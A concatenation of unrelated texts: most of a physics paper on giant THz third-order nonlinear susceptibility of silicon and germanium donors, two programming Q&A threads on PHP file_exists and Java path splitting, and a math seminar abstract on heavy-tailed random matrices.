$$\frac{n_{\text{3D}} e^4}{\epsilon_0 \hbar^3} \sum_{l,k,j} \frac{\left\langle \psi_g \left| \boldsymbol{\epsilon}\cdot\boldsymbol{r} \right| l \right\rangle \left\langle l \left| \boldsymbol{\epsilon}\cdot\boldsymbol{r} \right| k \right\rangle \left\langle k \left| \boldsymbol{\epsilon}\cdot\boldsymbol{r} \right| j \right\rangle \left\langle j \left| \boldsymbol{\epsilon}\cdot\boldsymbol{r} \right| \psi_g \right\rangle}{(\omega_{lg} - 3\omega)(\omega_{kg} - 2\omega)(\omega_{jg} - \omega)}$$
where e is the electron charge, and n3D is the concentration. χ(3) may be written in a similar form to Eqs (1) and (3), and for Nth order,
$$\chi^{(N)} = C^{(N)} \left[ \frac{a_B}{I_a^{N/2}} \right] \frac{n_{\text{3D}} e^{N+1}}{\hbar^{N/2} \epsilon_0}$$
(5)
where C(N) = 〈ψg|ζGNζ⋯ζG2ζG1ζ|ψg〉 is a dimensionless matrix element that may be found in a similar way to M(N), either by repeated application of Eq. (2), as has been done previously for alkali metal vapors6, or by using the implicit summation method of Eq. (4), with the only difference being that ω is no longer fixed at ωeg/N. The antiresonant terms13 and other non-linear processes, such as sum-frequency generation, can be calculated with simple modifications to Wn at each step.
### Multi-valley theory for donors in silicon and germanium
In this section, we develop the multi-valley theory for the nonlinear optical processes of donors based on the effective mass approximation (EMA). For simplicity of presentation, we describe the derivation for silicon; the case of germanium is discussed in the Supplementary Materials. It will become apparent that our theory is readily applicable to any donor in any host as long as the EMA is reliable.
To apply the method to donors, we require |ψg〉, ωg, |ψe〉, ωe and H|ψn〉. Silicon and germanium are indirect-gap semiconductors with equivalent conduction band minima (valleys) near the Brillouin zone edge; each minimum is characterized by a Fermi surface that is a prolate ellipsoid with transverse and longitudinal effective masses, mt,l. According to the Kohn-Luttinger effective mass approximation14, the state |ψj〉 of a shallow donor can be decomposed into slowly varying hydrogenic envelope functions, one for each valley, modulated by plane-wave functions corresponding to the crystal momenta at the minima, kμ (and a lattice periodic function that is unimportant here). We write $$\psi_j(\boldsymbol{r}) = \sum_\mu e^{i\boldsymbol{k}_\mu \cdot \boldsymbol{r}} F_{j,\mu}(\boldsymbol{r})$$ where Fj,μ(r) is the slowly varying envelope function. We have neglected the lattice periodic part, uμ(r), of the Bloch functions for simplicity of presentation. A rigorous derivation with uμ(r) included is provided in the Supplementary Materials, but it does not lead to any change in the final equations for the envelope functions (Eqs (7) and (8) below).
We separate the potential into the slowly varying Coulomb term of the donor V(r), and a rapidly varying term due to the quantum defect that is short range, U(r), referred to as the central cell correction (CCC). Within the EMA, the kinetic energy term in the Hamiltonian operates only on the envelope function, and the EMA Schrodinger equation may be written as
$$\sum_\mu e^{i \boldsymbol{k}_\mu \cdot \boldsymbol{r}} \left[ H_0 + U - \hbar \omega_j \right] F_{j,\mu}(\boldsymbol{r}) = 0$$
(6)
where H0 includes the Coulomb potential V(r): $$E_H^{ - 1}H_0 = - \frac{1}{2}a_B^2\left[ {\partial _x^2 + \partial _y^2 + \gamma \partial _z^2} \right] - a_Br^{ - 1}$$ using a valley-specific coordinate system (x, y, z where z is the valley axis, i.e., the valley-frame is rotated relative to the lab-frame of x1, x2, x3). The kinetic energy has cylindrical symmetry because γ = mt/ml ≠ 1, and V(r) and U(r) are spherical and tetrahedral respectively. H0 produces wave functions that are approximately hydrogen-like, and U(r) mixes them to produce states that transform as the A1, E and T2 components of the Td point group.
We take U(r) to be very short range, and we neglect the small change in the envelope functions over the short length scale 2π/|kμ|. Premultiplying Eq. (6) by $$e^{ - i{\boldsymbol{k}}_{\mu \prime }.{\boldsymbol{r}}}$$ and averaging over a volume (2π/|kμ|)3 around r, the Schrodinger eqn now reads $$\left[ {H_0 - \hbar \omega _j} \right]F_{j,\mu }({\boldsymbol{r}}) + \mathop {\sum}\nolimits_{\mu \prime } {U_{\mu \mu \prime }\delta ({\boldsymbol{r}})F_{j,\mu \prime }({\boldsymbol{r}})} = 0$$, where δ(r) is the Dirac delta function, and $$U_{\mu \mu \prime } = {\int} {d{\boldsymbol{r}}{\kern 1pt} e^{i({\boldsymbol{k}}_{\mu \prime } - {\boldsymbol{k}}_\mu ).{\boldsymbol{r}}}U({\boldsymbol{r}})}$$. For an A1 state, all the envelope functions have the same amplitude at r = 0, hence, $$\mathop {\sum}\nolimits_{\mu \prime } {U_{\mu \mu \prime }\delta ({\boldsymbol{r}})F_{j,\mu \prime }({\boldsymbol{r}})} = - U_{cc}\delta ({\boldsymbol{r}})F_{j,\mu }({\boldsymbol{r}})$$, where $$U_{cc} = - \mathop {\sum}\nolimits_{\mu \prime } {U_{\mu \mu \prime }}$$. It is found experimentally that for E and T2 states, the CCC has a rather small effect, and so we neglect it. Since H0 has cylindrical symmetry, the component of angular momentum about the valley axis is a conserved quantity, i.e., Fj,μ(r) = eimϕfj,m,μ(r, θ), where m is a good quantum number, and now fj,m,μ is a 2D function only. Substituting into the Schrodinger eqn, premultiplying by eimϕ and finally integrating over ϕ, the eigenproblems are
$$\begin{array}{rcl} \left[ H_0^{(m)} - U_{cc}\,\delta(\boldsymbol{r}) - \hbar \omega_j \right] f_{j,m,\mu}^{(A_1)}(r,\theta) &=& 0 \\ \left[ H_0^{(m)} - \hbar \omega_j \right] f_{j,m,\mu}^{(E,T_2)}(r,\theta) &=& 0 \end{array}$$
(7)
where $$H_0^{(m)} = H_0 + \frac{E_H a_B^2 m^2}{2(r \sin\theta)^2}$$. We solve Eq. (7) using a 2D finite element method (FEM) (see Supplementary Materials).
We focus on silicon, in which case the valley index, μ, runs over (±1, ±2, ±3), where 1, 2, 3 are the three crystal axes, and we let the light be polarized along a crystal axis, x1, by way of illustration; the calculation for germanium and other polarization directions is described in the Supplementary Materials. For the μ = ±1, ±2, ±3 valleys, aBζμ = z, x, y = r cos θ, r sin θ cos ϕ, r sin θ sin ϕ, respectively, because each has its coordinate rotated so that z is the valley axis. Following the expansion of ψj in terms of the fj,m,μ, we write the intermediate state functions as $$\psi _n({\boldsymbol{r}}) = \mathop {\sum}\nolimits_{m,\mu } {e^{im\phi }e^{i{\boldsymbol{k}}_\mu .{\boldsymbol{r}}}f_{n,m,\mu }(r,\theta )}$$, substitute them into $$G_n^{ - 1}\psi _n = \zeta \psi _{n - 1}$$, premultiply by $$e^{ - i{\boldsymbol{k}}_{\mu \prime }.{\boldsymbol{r}}}$$, average over a volume of (2π/|kμ|)3, premultiply by eimϕ, and finally, integrate over ϕ. Since f0,0,μ = fg,0,μ for all μ, we find that fn,m,3 = imfn,m,2 and fn,m,−μ = fn,m,μ, and
$$\begin{array}{l} \left[ H_0^{(m)} - W_n - \mathcal{D} \right] f_{n,m,1} - 2\mathcal{D} f_{n,m,2} = (E_H/a_B)\, r \cos\theta \, f_{n-1,m,1} \\ \left[ H_0^{(m)} - W_n - 2\mathcal{D} \right] f_{n,m,2} - \mathcal{D} f_{n,m,1} = (E_H/a_B)\, r \sin\theta \left[ f_{n-1,m-1,2} + f_{n-1,m+1,2} \right]/2 \end{array}$$
(8)
where $${\cal{D}} = U_{cc}\delta ({\boldsymbol{r}})\delta _{m,0}/3$$ and δm,0 is the Kronecker delta. In the above equations we drop the valley-specific coordinates in fn,m,μ for notational simplicity, and the coordinates in $$H_0^{(m)}$$ and the right hand side are understood to belong to the valley of the envelope function that they act on.
It is evident that the equations in Eq. (8) are not coupled by Ucc when the envelope function is zero at the origin. The ground state |ψ0〉 = |ψg〉 has only m = 0 components, and it has even parity. Therefore, |ψ1〉 has odd parity according to Eq. (8), so the Ucc coupling term is suppressed. By the same logic, the Ucc coupling is only non-zero for even n and m = 0. In the case of $$\left| f_{n,m,1} \right\rangle$$, there is only dipole coupling to the functions with the same m, while for $$\left| f_{n,m,2} \right\rangle$$ the dipole coupling is to states with Δm = ±1. The latter couplings are identical, so fn,−m,μ = fn,m,μ. Figure 1 shows how the intermediate states are coupled by dipole excitation and the CCC.
Equation (8) can be solved by sequential application of the 2D FEM15. To test our numerical calculation, we first compute C(3) for hydrogen, and each of the resonant and antiresonant terms is shown in Fig. 2. Their sum is shown in Fig. 3, and we find excellent agreement, within 0.2%, with the previous result obtained from a Sturmian Coulomb Green's function in ref. 16.
## Discussion
### Giant third-order nonlinear susceptibility
Since silicon and germanium donors have an isotropic potential in an isotropic dielectric, the lowest-order nonlinear response is determined by χ(3). The χ(3) spectrum for each (including the antiresonant terms) is shown in Fig. 3. We took the parameters for silicon obtained from spectroscopic17 and magneto-optical measurements12,18, which are γ ≈ 0.208, aB ≈ 3.17 nm and EH ≈ 39.9 meV; the parameters for germanium are γ ≈ 0.0513, aB ≈ 9.97 nm and EH ≈ 9.40 meV19. Resonances occur when 3ω = ωeg, labeled according to |ψe〉, and there are also sign changes at which |χ(3)| goes to zero. In the frequency range shown, we also observe a two-photon resonance for 1sA1 → 1sE, which is an obvious illustration of the need for a multivalley theory. There is no 3ω resonance with 1sT2 within the approximations made above, in which there is no intervalley dipole coupling. The effect of Ucc on χ(3) and the NPA matrix element is shown in Fig. 4. The low-frequency response of C(3) is illustrated at 100 GHz. Two higher-frequency curves are included, both far from 3ω resonances: one halfway between the 2p0 and 2p± resonances, and one halfway between the 3p0 and 3p± resonances. We choose these average frequencies since χ(3) for Si:P varies slowly around them (see Fig. 3) and hence would not be sensitive to small experimental variations in the light frequency. For the 2p-average frequency, the 2ω resonance with the 1sE produces a coincidental zero-crossing for Si:Bi. Example results for the intermediate state wave functions produced in the calculation are shown in Fig. 5. The state |ψ2〉 is much larger in extent (and in magnitude) than |ψ0〉, and the extra node in the radial dependence, due to the contribution of 2s, is visible at about 5 nm. Similarly, the state |ψ3〉 is much larger in extent (and in magnitude) than |ψ1〉.
The square bracket in Eq. (5) gives the scaling of χ(N) from hydrogenic atoms in vacuum to hydrogenic impurities in semiconductors, just as that in Eq. (1) does for w(N), and as before, the much smaller Ia greatly increases the strength of the non-linearity. For example, the low-frequency limit of the hyperpolarizability χ(3)/n3D for Si:P is much larger than that for hydrogen or alkali metal vapors such as Rb6, as shown in Fig. 3.
Some of the highest values of χ(3) have been reported for solids, e.g., 2.8 × 10−15 m2/V2 for InSb20 and 2 × 10−16 m2/V2 for GaTe21. To convert the hyperpolarizability to a bulk χ(3) value requires the concentration. To match InSb with Si:P at low frequency, where C(3) ≈ 1 (Fig. 4) and χ(3)/n3D = 2.9 × 10−38 m5/V2, requires a donor density of n3D = 1017 cm−3 (where the donor–donor distance is 10aB). At high frequency, the hyperpolarizability is much higher, but the density should be lower to avoid inhomogeneous concentration broadening of the nearby excited levels. For example, C(3) ≈ 20 between the 2p0 and 2p± resonances at $$\omega = \bar \omega _{2p}/3 = 2\pi \times 3.2\,{\text{THz}}$$ (Fig. 4), and we match InSb at a density of n3D = 5 × 1015 cm−3, at which concentration the 2p lines are well resolved22. If 3ω is moved even closer to the 2p± resonance (or if the resonance is tuned with a magnetic field18), then χ(3) could easily exceed that of InSb. Losses due to dephasing by phonon scattering may become important if the time spent in the intermediate states exceeds the phonon lifetime. Since the inverse of the former is given approximately by the detuning (ΔfΔt ≥ 1/2π) and the inverse of the latter by the phonon-limited linewidth (1/πT2 = 1 GHz23,24), this loss is negligible for much of the spectrum. At 50 GHz below the 2p± line, where such losses may be ignored, C(3) ≈ 200 and χ(3) is an order of magnitude above InSb.
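The density figures above can be sanity-checked directly (a quick arithmetic sketch using only values quoted in this section):

```python
# chi(3) = (chi(3)/n3D) * n3D, using numbers quoted in the text.
hyper_lo = 2.9e-38                 # m^5/V^2, low-frequency hyperpolarizability (C(3) ~ 1)
chi3_insb = 2.8e-15                # m^2/V^2, bulk InSb

chi3_low = hyper_lo * 1e17 * 1e6   # n3D = 1e17 cm^-3 = 1e23 m^-3  ->  ~2.9e-15 m^2/V^2

# Between the 2p0 and 2p+/- resonances C(3) ~ 20, so a 20x lower density
# n3D = 5e15 cm^-3 gives the same bulk value:
chi3_2p = 20 * hyper_lo * 5e15 * 1e6
```

Both working points give χ(3) ≈ 2.9 × 10−15 m2/V2, consistent with the claim of matching InSb.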
We are not aware of any larger values for bulk media, but higher “bulk” values have been reported for 2D systems such as graphene and MoS2, for which χ(3)L data are divided by an interaction thickness L to obtain χ(3); in particular, reports for graphene range from 10−19 m2/V2 (refs. 25,26) to 10−15 m2/V2 (ref. 27) for near-IR excitation, and up to 10−10 m2/V2 in the THz region under resonant enhancement by Landau levels in a magnetic field28. A recent experiment with single-layer graphene at room temperature reports a remarkably high value of 1.7 × 10−9 m2/V2 for the THz third-order nonlinear susceptibility29. In the case of coupled quantum wells (QWs), large values of χ(3) may be engineered through resonances, as demonstrated up to 10−14 m2/V2 (ref. 30). However, since the non-linear effect is limited by the interaction length, the 2D χ(3)L is probably a better figure of merit in these cases. For THz field-enhanced graphene with 50 layers, χ(3)L = 9 × 10−20 m3/V2 (ref. 28); for single-layer graphene, χ(3)L = 5.1 × 10−19 m3/V2 (ref. 29); and for resonant coupled QWs, χ(3)L = 1.4 × 10−18 m3/V2 (ref. 30). Even higher values are predicted for doped QWs, up to χ(3)L = 5 × 10−17 m3/V2 (ref. 31). To match this value with Si:P at $$\omega = \bar \omega _{2p}/3 = 2\pi \times 3.2\,{\text{THz}}$$ and n3D = 5 × 1015 cm−3 (see above) would require a sample thickness of L = 2 cm. Obviously, the required thickness can be significantly reduced when close to resonance, or for germanium.
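The 2 cm figure follows directly from the numbers quoted in this section (a sketch, assuming those values are exact):

```python
# chi(3)L matching the doped-QW prediction of 5e-17 m^3/V^2 with Si:P at
# n3D = 5e15 cm^-3 (= 5e21 m^-3) and C(3) ~ 20, as quoted above.
chi3 = 20 * 2.9e-38 * 5e21     # m^2/V^2
L = 5e-17 / chi3               # ~0.017 m, i.e. about 2 cm
```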
### Efficient third-harmonic generation
The non-linear susceptibility is important for predicting the strength of frequency conversion processes such as third-harmonic generation (3HG), and we use this as an example application to investigate the utility of the medium. A solution for the amplitude of the generated wave produced by 3HG, neglecting absorption, is given by32. Converting to irradiance in MKS units,
$$\frac{I_{\mathrm{out}}}{I_{\mathrm{in}}} = \left( \frac{3 \omega_{\mathrm{in}} \chi^{(3)} L I_{\mathrm{in}}}{4 \epsilon_0 n^2 c^2} \right)^2 = \left( \frac{I_{\mathrm{in}} f_{\mathrm{in}} n_{2\mathrm{D}}}{x} C^{(3)} \right)^2$$
(9)
where Iin is the irradiance of the input pump wave at frequency fin, n is the geometric mean of the refractive indexes for the input and output waves, and n2D = n3DL. Note that the isotropy mentioned earlier means that the polarization of the input and output waves must be parallel. We ignored a factor for the phase matching, which is unity if the length of the sample L ≪ Lc, where the coherence length Lc = πc/(3ωin[nout − nin]). Si:P at room temperature has a nearly constant n = 3.4153 in the range from 1 THz to 12 THz33, leading to typical values of Lc ≈ 10 cm. The factor x = 6.9 × 1023 W/cm2 × THz × cm−2 for silicon. For comparison, germanium has x = 9.2 × 1019 W/cm2 × THz × cm−2.
To illustrate the possible applications of this high χ(N), we note that two types of THz diode lasers are available: the quantum cascade laser (QCL), from 0.74 THz34 to 5.4 THz35 with output powers of up to a few W36,37, and the hot hole (p-Ge) laser38,39, with a similar range and power. However, there is a large gap in the availability of solid-state sources from about 5 THz to about 12 THz40, where the GaAs Reststrahlen band renders laser operation impossible. This is an important region for qubit applications41,42,43,44. Currently, the gap is only filled by larger, more expensive systems (difference frequency generators and free electron lasers). Tripling the output of 2–4 THz QCLs would fill the gap, but their output powers are far smaller than those typical for a pump laser in standard tripling applications, so a giant non-linearity is critical. At $$\omega = \bar \omega _{2p}/3 = 2\pi \times 3.2\,{\text{THz}}$$, C(3) ≈ 20, so for n2D = 1016 cm−2 (see above), a 1% predicted conversion may be obtained with 100 kW/cm2; by moving to 50 GHz below the 2p± resonance, this could be brought down to 10 kW/cm2, which is just about achievable with a well-focused QCL and would thus provide enough output for spectroscopy applications. A nonlinear process that may reduce the 3HG efficiency is multiphoton ionization45, since it reduces the population of donors in the ground state. When $$\omega = \bar \omega _{2p}/3$$, for example, four-photon absorption takes the electron to the continuum. We estimate this ionization rate in Si:P using the implicit summation method and find w = 3.17 s−1 for Iin = 10 kW/cm2. This simply means that the pulses must be kept significantly shorter than a second to avoid significant ionization.
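Eq. (9) reproduces the quoted conversion efficiencies with simple arithmetic (a sketch; the constant x and all input values are taken from the text above):

```python
# Iout/Iin = (I_in * f_in * n_2D * C3 / x)^2,
# with x = 6.9e23 W/cm^2 x THz x cm^-2 for silicon.
x = 6.9e23
f_in, n_2d = 3.2, 1e16                         # pump frequency (THz), n_2D (cm^-2)

eff_100kW = (1e5 * f_in * n_2d * 20 / x)**2    # C(3) ~ 20 at 100 kW/cm^2 -> ~1 %
eff_10kW  = (1e4 * f_in * n_2d * 200 / x)**2   # C(3) ~ 200 at 10 kW/cm^2 -> same ~1 %
```

The tenfold gain in C(3) near the 2p± resonance exactly offsets the tenfold reduction in pump intensity, since the efficiency depends on the product I_in C(3).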
In summary, we calculated the absolute values of the THz non-linear coefficients for the most common semiconductor materials, lightly doped silicon and germanium, which are available in the largest, purest and most regular single crystals known. The values we obtain for off-resonance rival the highest values obtained in any other material even when resonantly enhanced, and the material could gain new applications in THz photonics. We also predict the highly efficient third-harmonic generation of THz light in doped silicon and germanium. Our multi-valley theory for nonlinear optical processes of donors in silicon and germanium can be readily applied to any donor in any semiconductor host in which the effective mass approximation is reliable.
## Materials and methods
Details of the finite element computation used for solving the coupled partial differential equations (Eq. (8)) are provided in the Supplementary Material.
## Data availability
Data for Nguyen Le et al. Giant non-linear susceptibility of hydrogenic donors in silicon and germanium, https://doi.org/10.5281/zenodo.3269481. The data underlying this work is available without restriction.
## References
1. Kaiser, W. & Garrett, C. G. B. Two-photon excitation in CaF2:Eu2+. Phys. Rev. Lett. 7, 229–231 (1961).
2. Abella, I. D. Optical double-photon absorption in cesium vapor. Phys. Rev. Lett. 9, 453–455 (1962).
3. Saha, K. et al. Enhanced two-photon absorption in a hollow-core photonic-band-gap fiber. Phys. Rev. A 83, 033833 (2011).
4. Franken, P. A. et al. Generation of optical harmonics. Phys. Rev. Lett. 7, 118–119 (1961).
5. Ward, J. F. & New, G. H. C. Optical third harmonic generation in gases by a focused laser beam. Phys. Rev. 185, 57–72 (1969).
6. Miles, R. & Harris, S. Optical third-harmonic generation in alkali metal vapors. IEEE J. Quantum Electron. 9, 470–484 (1973).
7. Van Loon, M. A. W. et al. Giant multiphoton absorption for THz resonances in silicon hydrogenic donors. Nat. Photonics 12, 179–184 (2018).
8. Vampa, G. et al. Theoretical analysis of high-harmonic generation in solids. Phys. Rev. Lett. 113, 073901 (2014).
9. Beaulieu, S. et al. Role of excited states in high-order harmonic generation. Phys. Rev. Lett. 117, 203001 (2016).
10. Haworth, C. A. et al. Half-cycle cutoffs in harmonic spectra and robust carrier-envelope phase retrieval. Nat. Phys. 3, 52–57 (2007).
11. Gontier, Y. & Trahin, M. On the multiphoton absorption in atomic hydrogen. Phys. Lett. A 36, 463–464 (1971).
12. Li, J. et al. Radii of Rydberg states of isolated silicon donors. Phys. Rev. B 98, 085423 (2018).
13. Boyd, R. W. Nonlinear Optics. 3rd edn (Academic Press, New York, 2008).
14. Kohn, W. & Luttinger, J. M. Theory of donor states in silicon. Phys. Rev. 98, 915–922 (1955).
15. The Mathematica FEM code used in this paper is available at https://github.com/lehnqt/chi3.git.
16. Mizuno, J. Use of the Sturmian function for the calculation of the third harmonic generation coefficient of the hydrogen atom. J. Phys. B: At. Mol. Phys. 5, 1149–1154 (1972).
17. Ramdas, A. K. & Rodriguez, S. Review article: spectroscopy of the solid-state analogues of the hydrogen atom: donors and acceptors in semiconductors. Rep. Prog. Phys. 44, 1297–1387 (1981).
18. Murdin, B. N. et al. Si:P as a laboratory analogue for hydrogen on high magnetic field white dwarf stars. Nat. Commun. 4, 1469 (2013).
19. Faulkner, R. A. Higher donor excited states for prolate-spheroid conduction bands: a reevaluation of silicon and germanium. Phys. Rev. 184, 713–721 (1969).
20. Yuen, S. Y. & Wolff, P. A. Difference-frequency variation of the free-carrier-induced, third-order nonlinear susceptibility in n-InSb. Appl. Phys. Lett. 40, 457–459 (1982).
21. Susoma, J. et al. Second and third harmonic generation in few-layer gallium telluride characterized by multiphoton microscopy. Appl. Phys. Lett. 108, 073103 (2016).
22. Thomas, G. A. et al. Optical study of interacting donors in semiconductors. Phys. Rev. B 23, 5472–5494 (1981).
23. Steger, M. et al. Shallow impurity absorption spectroscopy in isotopically enriched silicon. Phys. Rev. B 79, 205210 (2009).
24. Greenland, P. T. et al. Coherent control of Rydberg states in silicon. Nature 465, 1057–1061 (2010).
25. Woodward, R. I. et al. Characterization of the second- and third-order nonlinear optical susceptibilities of monolayer MoS2 using multiphoton microscopy. 2D Mater. 4, 11006 (2017).
26. Karvonen, L. et al. Rapid visualization of grain boundaries in monolayer MoS2 by multiphoton microscopy. Nat. Commun. 8, 15714 (2017).
27. Säynätjoki, A. et al. Rapid large-area multiphoton microscopy for characterization of graphene. ACS Nano 7, 8441–8446 (2013).
28. König-Otto, J. C. et al. Four-wave mixing in Landau-quantized graphene. Nano Lett. 17, 2184–2188 (2017).
29. Hafez, H. A. et al. Extremely efficient terahertz high-harmonic generation in graphene by hot Dirac fermions. Nature 561, 507–511 (2018).
30. Sirtori, C. et al. Giant, triply resonant, third-order nonlinear susceptibility $$\chi_{3\omega}^{(3)}$$ in coupled quantum wells. Phys. Rev. Lett. 68, 1010–1013 (1992).
31. Yildirim, H. & Aslan, B. Donor-related third-order optical nonlinearities in GaAs/AlGaAs quantum wells at the THz region. Semicond. Sci. Technol. 26, 085017 (2011).
32. Shen, Y. R. The Principles of Nonlinear Optics. 3rd edn (Wiley-Interscience, New York, 2002).
33. Chick, S. et al. Metrology of complex refractive index for solids in the terahertz regime using frequency domain spectroscopy. Metrologia 55, 771 (2018).
34. Scalari, G. et al. Magnetically assisted quantum cascade laser emitting from 740 GHz to 1.4 THz. Appl. Phys. Lett. 97, 081110 (2010).
35. Wienold, M. et al. Frequency dependence of the maximum operating temperature for quantum-cascade lasers up to 5.4 THz. Appl. Phys. Lett. 107, 202101 (2015).
36. Li, L. et al. Terahertz quantum cascade lasers with >1 W output powers. Electron. Lett. 50, 4309 (2014).
37. Li, L. H. et al. Multi-Watt high-power THz frequency quantum cascade lasers. Electron. Lett. 53, 799 (2017).
38. Pfeffer, P. et al. p-type Ge cyclotron-resonance laser: theory and experiment. Phys. Rev. B 47, 4522–4531 (1993).
39. Hübers, H. W., Pavlov, S. G. & Shastin, V. N. Terahertz lasers based on germanium and silicon. Semicond. Sci. Technol. 20, S211–S221 (2005).
40. Ohtani, K., Beck, M. & Faist, J. Double metal waveguide InGaAs/AlInAs quantum cascade lasers emitting at 24 μm. Appl. Phys. Lett. 105, 121115 (2014).
41. Saeedi, K. et al. Optical pumping and readout of bismuth hyperfine states in silicon for atomic clock applications. Sci. Rep. 5, 10493 (2015).
42. Litvinenko, K. L. et al. Coherent creation and destruction of orbital wavepackets in Si:P with electrical and optical read-out. Nat. Commun. 6, 6549 (2015).
43. Chick, S. et al. Coherent superpositions of three states for phosphorous donors in silicon prepared using THz radiation. Nat. Commun. 8, 16038 (2017).
44. Stoneham, A. M. et al. Letter to the editor: optically driven silicon-based quantum gates with potential for high-temperature operation. J. Phys.: Condens. Matter 15, L447–L451 (2003).
45. Bebb, H. B. & Gold, A. Multiphoton ionization of hydrogen and rare-gas atoms. Phys. Rev. 143, 1–24 (1966).
## Acknowledgements
We acknowledge financial support from the UK Engineering and Physical Sciences Research Council [ADDRFSS, Grant No. EP/M009564/1] and EPSRC strategic equipment grant no. EP/L02263X/1.
## Author information
### Contributions
N.H. Le and B.N. Murdin worked on the multivalley theory and the finite element calculation of the third-order susceptibility. B.N. Murdin and G.V. Lanskii calculated the third-harmonic generation efficiency. B.N. Murdin, N.H. Le and G. Aeppli wrote the manuscript. All authors contributed to the discussion of the results.
### Corresponding author
Correspondence to Benedict N. Murdin.
## Ethics declarations
### Conflict of interest
The authors declare that they have no conflict of interest.
## Rights and permissions
Le, N.H., Lanskii, G.V., Aeppli, G. et al. Giant non-linear susceptibility of hydrogenic donors in silicon and germanium. Light Sci Appl 8, 64 (2019). https://doi.org/10.1038/s41377-019-0174-6
PHP file_exists($var) not working

I'm trying to write some code on my notebook and am using the XAMPP environment. I have the following piece of code:

class A {
    ...
    foreach ($blocks as $block) {
        $block = 'dir/dir2/' . $block;
    }
    if (file_exists($block) == true) {
        $var .= file_get_contents($block);
    }
}

When I echo the $block variable in the foreach loop, it gives back the path to the files. However, the file_exists function always returns false. Could you please help me figure out what's wrong here?

-

8 Answers

The purpose of file_exists is to check whether the supplied file exists. It's returning false. This means your file doesn't exist where PHP is looking; PHP might be looking in a different area than you expect. Looks like it's time for some debugging. Run this to figure out where PHP is looking:

echo "current working directory is -> " . getcwd();

Is that where you want PHP to look? If not, change the directory PHP is looking in with the chdir function:

$searchdirectory = "c:\\path\\to\\your\\directory"; // use unix-style paths if necessary
chdir($searchdirectory);

Then run your function (note: I flipped the slashes to backslashes to be consistent with Windows-style paths, and doubled them so PHP does not treat sequences like \t as escapes):

class A {
    ...
    // change working directory
    $searchdirectory = "c:\\path\\to\\your\\directory"; // use unix-style paths if necessary
    chdir($searchdirectory);
    foreach ($blocks as $block) {
        $block = 'dir\\dir2\\' . $block;
        if (file_exists($block) == true) {
            $var .= file_get_contents($block);
        }
    }
}
-
Quoting someone's comment on the PHP file_exists manual page:
Be aware: If you pass a relative path to file_exists, it will return false unless the path happens to be relative to the "current PHP dir" (see chdir() ).
In other words, if your path is relative to the current file's directory, you should prepend dirname(__FILE__) to your relative paths, or as of PHP 5.3, you can just use __DIR__.
-
TJM, if I add __DIR__, the echo gives me "C:\xampp\htdocs/dir/dir2" and the file_exists still doesn't work. – Alex May 28 '11 at 15:20
@Alex you're mixing unix and windows style paths, use dir\dir2 instead – onteria_ May 28 '11 at 15:50
Ah yeah, I assumed linux based on your paths, as onteria_ says, changing your path separator should fix it. – tjm May 28 '11 at 15:54
Thanks. Sorry for a totally dumb question but what would be the best way to do that so that I won't have to rewrite the slashes when I deploy the code on the server? – Alex May 28 '11 at 16:07
@jeremysawesome @Alex the DIRECTORY_SEPARATOR constant – Wiseguy May 28 '11 at 16:24
It may be too late, but I just found the solution after banging my head for the last 2 hrs. In case you are using Windows: it hides file name extensions by default. So a.txt will be displayed as a, and the file which is displayed as a.txt is actually a.txt.txt. To view file extensions go to Control Panel -> Appearance and Personalization -> Folder Options -> View
and uncheck "Hide extensions for known file types". Now you can see the true name which is to be used in file_exists().
-
You are mixing slashes; this one drove me nuts.
Here is the solution:
echo getcwd();
$searchimg = getcwd().'\\public\\images\\pics\\'.$value['name'].'.'.$value['ext'];

You will need to quote the slashes like that all the way to the picture :)

-

As far as I see, you are using file_exists outside the foreach loop. Hence the $block variable is not bound at the time.
EDIT: actually it is still bound to the last value in your collection.
-
It is bound, but it holds the value of the last iteration in the loop. This item happens not to exist, so it appears that file_exists "always" returns false. – PreferenceBean May 28 '11 at 15:12
Thanks, Tomalak, indeed it holds the last value! – naivists May 28 '11 at 15:14
TJM, if I add __DIR__, the echo gives me "C:\xampp\htdocs/dir/dir2" and the file_exists still doesn't work. – Alex May 28 '11 at 15:19
@Alex: Then the path doesn't exist. Not a huge surprise since you're mixing slashes. – PreferenceBean May 28 '11 at 15:54
Thanks, Tomalak. Trying to figure out how to change the slashes when calling __DIR__ without having to recode everything when I deploy the code online. – Alex May 28 '11 at 16:09
Do you intend to check file_exists() inside the foreach loop?
class A {
...
foreach ($blocks as $block) {
    $block = 'dir/dir2/' . $block;
    // Inside the loop
    if (file_exists($block) == true) {
        $var .= file_get_contents($block);
    }
}

-

Yes, Michael. That's the idea. – Alex May 28 '11 at 15:24

I guess the check of file_exists works a bit differently from opening with file_get_contents, so maybe it could be one of these problems:

• file_exists: returns FALSE if inaccessible due to safe mode restrictions
• file_exists: for checking it uses the real UID/GID and not the effective rights
• file_get_contents: uses a protocol that file_exists does not know

Maybe it helps you further! Good luck

-

If you use a variable for your file, make sure that there are no blank spaces at the end. I went mad until I found the solution: removing blanks with trim(). See below.

if (file_exists(trim($Filename)))

-
Mathematics Colloquia and Seminars
Take a square $N\times N$ symmetric matrix $X_N$ with real i.i.d. random entries above the diagonal with law $\mu$ such that $\mu(x^2)=1$. Then, if $\lambda_i$, $1\le i\le N$, denote the eigenvalues of $X_N$, Wigner's theorem asserts that the spectral measure $N^{-1}\sum_{i=1}^N \delta_{\lambda_i/\sqrt{N}}$ converges weakly, in expectation and almost surely, towards the semi-circle law. We study what happens when $\mu$ has no finite second moment but belongs to the domain of attraction of an $\alpha$-stable law. In particular, we show the weak convergence of $\mathbb{E}[N^{-1}\sum_{i=1}^N \delta_{\lambda_i/N^{1/\alpha}}]$ towards a symmetric law with heavy tail.
Solved
# java string.split file directory path
Posted on 2011-03-01
Medium Priority
2,951 Views
Hello

Trying to return the file name from the directory path. It's not splitting the string at all.

public String getFilenameFromFile(String file)
{
    String delims = "[\\]"; // <-- when I debug this is the symbol separating the folders
    String[] tokens = file.split(delims);
    int num = tokens.length;
    String lfilename = tokens[num].toString();
    return filename;
}
Question by: AndyC1000
LVL 40
Expert Comment
ID: 35013841
can you print the 'file' variable contents?
LVL 47
Expert Comment
ID: 35013852
http://stackoverflow.com/questions/1099859/how-to-split-a-path-platform-independent
offers this solution:
String[] subDirs = path.split(Pattern.quote(File.separator));
LVL 47
Accepted Solution
for_yan earned 332 total points
ID: 35013876
And I tested it
String[] subDirs = path.split(Pattern.quote(File.separator));
and it really works
"C:\\temt\\text.txt" -->
C:
temt
text.txt
LVL 92
Assisted Solution
objects earned 168 total points
ID: 35013878
try this:
File f = new File(file);
String filename = f.getName();
